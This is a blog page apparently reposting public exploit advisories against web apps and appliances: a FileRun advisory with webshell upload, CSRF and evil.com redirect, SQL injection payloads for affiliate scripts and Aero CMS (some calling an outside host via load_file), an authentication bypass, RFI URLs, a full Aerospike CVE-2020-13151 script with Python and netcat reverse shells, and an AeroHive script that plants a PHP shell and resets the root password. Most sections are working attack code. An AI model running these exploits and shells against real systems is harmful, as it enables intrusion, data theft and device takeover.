Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863102894

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
SEC Consult Vulnerability Lab Security Advisory < 20171018-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Afian AB FileRun
 vulnerable version: 2017.03.18
      fixed version: 2017.09.18
             impact: critical
           homepage: https://www.filerun.com | https://afian.se
              found: 2017-08-28
                 by: Roman Ferdigg (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"FileRun File Manager: access your files anywhere through self-hosted
secure cloud storage, file backup and sharing for your photos, videos,
files and more. Upload and download large files for easy sharing. Google
Drive self-hosted alternative."

Source: https://www.filerun.com


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can compromise the web server which has FileRun installed. User files might
get exposed through this attack.

SEC Consult recommends not to use FileRun until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.


Vulnerability overview/description:
-----------------------------------
1) Path Manipulation
When uploading, downloading or viewing files, FileRun uses a parameter to
specify the path on the file-system. An attacker can manipulate the value
of this parameter to read, create and even overwrite files in certain
folders. An attacker could upload malicious files to compromise the
webserver. In combination with the open redirect and CSRF vulnerability
even an unauthenticated attacker can upload these files to get a shell.
Through the shell all user files can be accessed.


2) Stored Cross Site Scripting (XSS) via File Upload
The application allows users to upload different file types. It is also
possible to upload HTML files or to create them via the application's text
editor. Files can be shared using a link or within the FileRun application
(in the enterprise version). An attacker can inject JavaScript in HTML
files to attack other users or simply create a phishing site to steal user
credentials.

Remark:
In the standard configuration of the FileRun docker image the HttpOnly
cookie flag is not set, which means that authentication cookies can be
accessed in an XSS attack. This allows easy session hijacking as well.


3) Cross Site Request Forgery (CSRF)
The application does not implement CSRF protection. An attacker can exploit
this vulnerability to execute arbitrary requests with the privileges of the
victim. The only requirement is that a victim visits a malicious webpage.
Such a page could be hosted on the FileRun server itself and shared with
other users as described in vulnerability 2.
Besides others, the following actions can be performed via CSRF if the
victim has administrative privileges:
 - Create or delete users
 - Change permissions rights of users
 - Change user passwords

If the victim has no administrative privileges, for example the following
actions can be performed:
 - Upload files
 - Change the email address (for password recovery)


4) Open Redirect Vulnerabilities
An open redirect vulnerability in the login and logout pages allows an
attacker to redirect users to arbitrary web sites. The redirection host
could be used for phishing attacks (e.g. to steal user credentials) or for
running browser exploits to infect a victim's machine with malware. The open
redirect in the login page could also be used to exploit CSRF (see above).
Because the server name in the manipulated link is identical to the
original site, phishing attempts may have a more trustworthy appearance.


Proof of concept:
-----------------
1) Path Manipulation
The URL below is used to read the application file "autoconfig.php", which
contains the username and cleartext password of the database.

URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php


This post request is used to upload a PHP shell in the writable folder
avatars:

POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1
Host: $DOMAIN
[...]
Content-Type: multipart/form-data; boundary=---------------------------293712729522107
Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english
DNT: 1
Connection: close

-----------------------------293712729522107
Content-Disposition: form-data; name="flowTotalSize"

150
-----------------------------293712729522107
Content-Disposition: form-data; name="flowIsFirstChunk"

1
-----------------------------293712729522107
Content-Disposition: form-data; name="flowIsLastChunk"

1
-----------------------------293712729522107
Content-Disposition: form-data; name="flowFilename"

shell.php
-----------------------------293712729522107
Content-Disposition: form-data; name="path"

/var/www/html/system/data/avatars/
-----------------------------293712729522107
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

*web shell payload here*

-----------------------------293712729522107--

To execute the uploaded shell a .htaccess file with the contents below can
be uploaded in the same folder.

Content of .htaccess file:
<Files  "*">
 Order allow,deny
 Allow from all
</Files>

The uploaded shell can be accessed by the following URL:
http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php

2) Stored Cross Site Scripting (XSS) via File Upload
An HTML file with JavaScript code can be easily uploaded to attack other users.
No PoC necessary.

3) Cross Site Request Forgery
An example for a CSRF attack would be the following request which changes
the email address of the victim:

<html>
  <body>
    <form action="http://$DOMAIN/?module=fileman&section=profile&action=save"
method="POST">
      <input type="hidden" name="receive_notifications" value="0" />
      <input type="hidden" name="two_step_enabled" value="0" />
      <input type="hidden" name="name" value="User" />
      <input type="hidden" name="name2" value="A" />
      <input type="hidden" name="email" value="newemail@example.com" />
      <input type="hidden" name="ext-comp-1009" value="on" />
      <input type="hidden" name="current_password" value="" />
      <input type="hidden" name="new_password" value="" />
      <input type="hidden" name="confirm_new_password" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The new email address can be used by the attacker to reset the password of
the victim.


4) Open Redirect Vulnerabilites
The URL below can be used to forward a user to an arbitrary website after
the login:
http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ==

The value of the redirect parameter needs to be base64 encoded.

To redirect a user after logout, following URL can be used:
http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com

In this case for a successful exploit, the victim has to be logged in.


Vulnerable / tested versions:
-----------------------------
The regular version of FileRun 2017.03.18 has been tested. It is assumed
earlier versions of FileRun are also vulnerable to the issues.


Vendor contact timeline:
------------------------
2017-08-31: Contacting vendor through info@afian.se, info@filerun.com
2017-09-01: Sending unencrypted advisory as requested by vendor
2017-09-04: FileRun fixed the vulnerability "Path Manipulation"
2017-09-12: Requesting a status update
2017-09-13: FileRun informed us that a patch for all vulnerabilities will
            be released before 2017-09-20
2017-09-16: Patch available
2017-10-18: Public release of security advisory


Solution:
---------
Update to the latest version available (see https://docs.filerun.com/updating).
According to FileRun, all the vulnerabilities are fixed in release
2017.09.18 or higher.

For further information see:
https://www.filerun.com/changelog


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Roman Ferdigg / @2017
HireHackking 
# # # # # 
# Exploit Title: Affiligator - Affiliate Webshop Management System 2.1.0 - SQL Injection
# Dork: N/A
# Date: 23.01.2018
# Vendor Homepage: https://www.getaffiligator.com/
# Software Link: https://codecanyon.net/item/affiligator-affiliate-webshop-management-system/21214946
# Version: 2.1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5977
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/search/?q=&price_type=range&price=[SQL]
# 
# %31%30%30%20%61%6e%64%28%73%65%6c%65%63%74%21%56%65%72%41%79%61%72%69%2d%7e%30%2e%20%66%72%6f%6d%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%56%65%72%73%69%6f%6e%28%29%29%29%79%29%78%29
# 
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ICAffiliateTracking - Affiliate Tracking Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/affiliates-tracking-script.htm
# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/adminlogin.asp and set Username and Password to 'or''=' and hit enter.
# # # # #
HireHackking 
# Exploit Title: Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 05/01/2022

Document Title:
===============
Affiliate Pro v1.7 - Multiple Cross Site Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2281


Release Date:
=============
2022-01-05


Vulnerability Laboratory ID (VL-ID):
====================================
2281


Common Vulnerability Scoring System:
====================================
5.1


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Affiliate Pro is a Powerful and yet simple to use PHP affiliate Management System for your new or existing website. Let affiliates
sell your products, bring you traffic or even leads and reward them with a commission. More importantly, use Affiliate Pro to track
it intelligently to keep your affiliates happy and also your bottom line! So how does it work? It is pretty simple, when a user visits
your website through an affiliate URL the responsible affiliate sending the traffic to you will receive a commission based on your settings.

(Copy of the Homepage:https://jdwebdesigner.com/ &https://codecanyon.net/item/affiliate-pro-affiliate-management-system/12908496 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple reflected cross site scripting web vulnerabilities in the Affiliate Pro - Affiliate Management System v1.7.


Affected Product(s):
====================
jdwebdesigner
Product: Affiliate Pro v1.7 - Affiliate Management System (PHP) (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-08-30: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple reflected cross site scripting web vulnerabilities has been discovered in the Affiliate Pro - Affiliate Management System v1.7.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise client-site
browser to web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the `email`,`username` and `fullname` parameters of the `index` module.
Attackers are able to inject own malicious script code to the `Fullname`,`Username` or `Email` input fields to manipulate client-side requests.
The request method to inject is post and the attack vector is non-persistent (reflected) on client-side. The injection- and execution points are
located in the index formular for affiliates to enter.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to
malicious source and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] index

Vulnerable Input(s):
[+] Email
[+] Username
[+] Fullname

Vulnerable Parameter(s):
[+] email
[+] username
[+] fullname


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.


Exploitation: Payload
<iframe src="javascript:alert(1337)"></iframe>
%3cscript%3ealert(1337)%3c%2fscript%3


--- PoC Session Logs (POST) ---
POST /affiliate-pro-demo/index HTTP/1.1
Host: affiliates-pro.localhost:8000
Origin:http://affiliates-pro.localhost:8000
Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24
Referer:http://affiliates-pro.localhost:8000/affiliate-pro-demo/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
-
fullname=<iframe src="javascript:alert(1337)"></iframe>
&username=<iframe src="javascript:alert(1337)"></iframe>@pwnd.coml00fp%22%3e%3cscript%3ealert(1337)%3c%2fscript%3ewkgzv
&p=test&confirmpwd=j2B%21p5o%21K8
-
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: session_id=92b8a43b5bdf5d1c54999bfbcf702f24; path=/; HttpOnly
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Length: 6549
Content-Type: text/html; charset=UTF-8


Vulnerable Source: Index
<div class="control-group">
<label class="control-label" for="fullname">Full Name</label>
<div class="controls">
<input id="textinput" name="fullname" type="text" placeholder="Full Name" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required="required">
</div>
</div>
<div class="control-group">
<label class="control-label" for="username">Username</label>
<div class="controls">
<input id="textinput" name="username" type="text" placeholder="username" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required>
</div>
</div>
<div class="control-group">
<label class="control-label" for="email">E-Mail Address</label>
<div class="controls">
<input id="textinput" name="email" type="email" placeholder="test@provider.com" class="input-xlarge" value="<iframe src="javascript:alert(1337)"></iframe>" required>
</div>


Security Risk:
==============
The security risk of the client-side cross site scripting vulnerabilities in the web-application are estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
HireHackking 
# # # # #
# Exploit Title: Affiliate Niche Script 3.4.0 SQL Injection
# Dork: N/A
# Date: 21.08.2017
# Vendor Homepage: https://scriptoffice.com/
# Software Link: https://soft.scriptoffice.com/projects/affiliatenichescript/wiki/Main_Menu
# Demo: http://demodesigns.affiliatenichescript.com/
# Version: 3.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# 
# http://localhost/[PATH]/default_blue/Appliances/Categories/[SQL]/
# 
# 1'+uNiOn+sElEct+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283929,0x28313029,0x28313129,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229+--+-/
#
# Etc...
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Affiliate MLM Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/affiliate-mlm-script/
# Demo: http://www.smsemailmarketing.in/demo/Affiliate/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/product-category.php?key=[SQL]
# 
# Parameter: key (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: key=a%' AND 5436=5436 AND '%'='
# 
# # # # #
HireHackking 
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/


[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech


[#] Exploit:

[path]/admin.php?show=reply&id=[Injected Query]


[#] 3xample:

[path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -


[#] Notes:
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
HireHackking 
source: https://www.securityfocus.com/bid/64541/info
  
AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
  
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
  
http://www.example.com/afcontrol/controlheader.php?rootpathtocart=[RFI]
HireHackking 
source: https://www.securityfocus.com/bid/64541/info
 
AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
 
http://www.example.com/afcontrol/adminpassword.php?rootpathtocart=[RFI]
HireHackking 
source: https://www.securityfocus.com/bid/64541/info

AFCommerce is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information or to execute arbitrary script code in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/afcontrol/adblock.php?rootpathtocart=[RFI]
HireHackking 
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151

#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string

# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev

PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'

def _get_client(cfg):
	try:
  		return aerospike.client({
  			'hosts': [(cfg.ahost, cfg.aport)],
  			 'policies': {'timeout': 8000}}).connect()

	except Exception as e:
	  	print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")

def _send(client, cfg, _cmd):
	try:
		print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
	except Exception as e:
		print(f"[-] UDF execution returned {e.msg}")

def _register_udf(client, cfg):
	try:
		client.udf_put(cfg.udfpath)
	except Exception as e:
		print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
		raise e

def _random_string(l):
	return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])

def _populate_table(client, cfg):
	ns = cfg.namespace
	setname = cfg.setname
	print(f"[+] writing to {ns}.{setname}")
	try:
		rec = cfg.dummystring
		client.put((ns, setname, rec), {'pk':cfg.dummystring})
		print(f"[+] wrote {rec}")
	except Exception as e:
		print(f"[-] unable to write record: {e.msg}")
		try:
			if e.msg.startswith('Invalid namespace'):
				print("Valid namespaces: ")
				for n in _info_parse("namespaces", client).split(";"):
					print(n.strip())
		except:
			pass
		sys.exit(13)

def _info_parse(k, client):
	try: 
		return [i[1] for i in client.info_all(k).values() ][0]
	except Exception as e:
		print(f"error retrieving information: {e.msg}")
		return []

def _is_vuln(_mj, _mi, _pt, _bd):
	fixed = [5,1,0,0]
	found = [_mj, _mi, _pt, _bd]

	if fixed == found:
		return False

	for ix, val in enumerate(found):
		if val < fixed[ix]:
			return True
		elif val == fixed[ix]:
			pass
		else:
			return False


def _version_check(client):
	print("[+] aerospike build info: ", end="")
	try:
		_ver = _info_parse("build", client)
		print(_ver)
		mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
		if _is_vuln(mj, mi, pt, bd):
			print("[+] looks vulnerable")
			return
		else:
			print(f"[-] this instance is patched.")
			sys.exit(0)

	except Exception as e:
		print(f"[+] unable to interpret build number due to {e}")
		print("[+] continuing anyway... ")

def _exploit(cfg):
	client = _get_client(cfg)
	
	if not client:
		return

	_version_check(client)

	print(f"[+] populating dummy table.")
	_populate_table(client, cfg)

	print(f"[+] registering udf")
	
	_register_udf(client, cfg)

	if cfg.pythonshell or cfg.netcatshell:
		sys.stdout.flush()
		print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
		sys.stdout.flush()
		for i in range(4): 
			print(".", end="")
			sys.stdout.flush()
			sleep(1)

		print(".")
		_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
	
	if cfg.cmd:
		print(f"[+] issuing command \"{cfg.cmd}\"")
		_send(client, cfg, cfg.cmd)

if __name__ == '__main__':
	if len(sys.argv) == 1:
		print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
		print("... or ... ")
		print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
		sys.exit(0)

	parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
	
	parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
	parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
	parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
	parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
	parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
	parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
	parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
	parser.add_argument("--lhost", help="host to use for reverse shell callback")
	parser.add_argument("--lport", help="port to use for reverse shell callback")
	parser.add_argument("--cmd", help="custom command to issue against the underlying host")
	parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)

	cfg = parser.parse_args()
	if not cfg.setname:
		cfg.setname = 'cve202013151'
	if not cfg.dummystring:
		cfg.dummystring = _random_string(16)
	if not cfg.udfpath:
		cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')

	assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
	if cfg.pythonshell or cfg.netcatshell:
		assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"

	_exploit(cfg)
HireHackking 
#!/usr/bin/python3

# TARGET: AeroHive AP340 HiveOS < 6.1r5
# Confirmed working on AP340 HiveOS 6.1r2
# This program uses a local file inclusion vulnerability
# 1. Poison the log file in /var/log/messages by injecting PHP code into the 
#    username field of the login page
# 2. Call the uploaded PHP shell with the LFI URL, changing the root password for SSH
# 3. Login with SSH as root using password "password"

import sys
from urllib.parse import urlencode
from urllib.request import Request, urlopen
import urllib



# Payload to poison the log file at /var/log/messages
# Note if you mess up and get invalid syntax errors just reboot AP it
# will erase/rotate the logs

payload_inject = "<?php if(isset($_REQUEST[\'cmd\'])){     $cmd = ($_REQUEST[\"cmd\"]);     system($cmd);     echo \"</pre>$cmd<pre>\";     die; } ?>"

# URL of the login page where we will inject our PHP command exec code so it poisons the log file
post_url= "/login.php5?version=6.1r2"
post_fields = {"login_auth" : "1", "miniHiveUI" : "1", "userName" : payload_inject, "password" : "1234"}
post_fields = urllib.parse.urlencode(post_fields)
data = post_fields.encode('ascii')


# Payload to call the injected PHP code
payload_lfi_url = "/action.php5?_action=get&_actionType=1&_page=../../../../../../../../../../var/log/messages%00&cmd="

# Payload to change the root SSH user password
payload_command = "echo+root:password+|+/usr/sbin/chpasswd"

# Combined payload to change password using LFrI
payload_chpasswd = payload_lfi_url+payload_command

print("\n* * * * * AeroHive AP340 HiveOS < 6.1r2 Root Exploit * * * * *\n")

# Get target URL from user
print("\nPlease enter the IP address of the AeroHive AP340 ex: 192.168.1.1\n")
wap_ip = input(">>> ")
base_url = "http://" + wap_ip

# Poison log file with POST to login page
# json_data = json.dumps(post_fields).encode("utf8")
# request = urllib.request.Request(base_url+post_url, post_fields)
print ("Poisoning log file at /var/log/messages. . .")
request = urllib.request.Request(base_url+post_url, data)
json = urlopen(request).read().decode()

# Change the command with LFI->command execution
print("Interacting with PHP shell to change root password. . .")
content = urllib.request.urlopen(base_url+payload_chpasswd).read()
if "Password for " in content.decode('ascii'):
	print("Success!")
	print("Now try to log in with root:password via SSH!")
else:
	print("Exploit Failed")
HireHackking

Aero CMS v0.0.1 - SQLi 

# Title: Aero CMS v0.0.1 - SQLi
# Author: nu11secur1ty
# Date: 08.27.2022
# Vendor: https://github.com/MegaTKC
# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi

# Description:
The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
be vulnerable to SQL injection attacks.
The malicious user can dump-steal the database, from this CMS system
and he can use it for very malicious purposes.

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: author (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: author=admin'+(select
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: author=admin'+(select
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: author=admin'+(select
load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
UNION ALL SELECT
NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
---

```
HireHackking 
# Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
# Date: 15/10/2022
# Exploit Author: Hubert Wojciechowski
